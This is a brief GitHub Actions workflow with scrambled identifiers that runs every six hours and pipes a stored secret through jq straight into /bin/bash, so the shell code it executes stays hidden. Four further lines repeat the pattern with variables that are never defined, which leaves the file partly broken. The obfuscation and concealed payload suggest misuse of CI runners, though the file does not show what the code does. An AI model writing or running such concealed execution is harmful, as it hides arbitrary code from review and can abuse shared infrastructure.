name: midayuan3810

on:
  workflow_dispatch:
  schedule:
    - cron: '4 3/6 * * *'
jobs:
  build:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
      - name: midayuan3810
        env:
          mm03: ${{ secrets.mm03 }}
        run: |
          echo $mm03 | jq -r .wtpwj8130 | /bin/bash
          echo $x0895 | jq -r .js9355 | /bin/bash
          echo $gub884 | jq -r .nytbv2748 | /bin/bash
          echo $hiv15244 | jq -r .mrik1279 | /bin/bash
          echo $xp2 | jq -r .pen572 | /bin/bash

